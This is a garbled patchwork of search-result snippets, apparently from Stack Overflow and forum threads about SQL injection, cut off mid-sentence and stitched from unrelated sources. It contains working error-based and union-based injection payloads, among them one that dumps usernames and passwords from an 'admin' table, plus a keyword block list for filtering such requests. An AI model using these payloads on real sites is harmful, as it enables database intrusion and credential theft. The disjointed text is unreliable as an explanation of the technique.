sql - Union to handle NULL values - Stack Overflow ... count(*),concat((select ( select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from
Display results as threads. More... Useful Searches.
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection.
The used SELECT statement, referer: http://site.com/index.php?page=shop.browse&category_id=25&option...
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
You can clearly see rules containing keywords "select", "union", "all" etc.
...all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.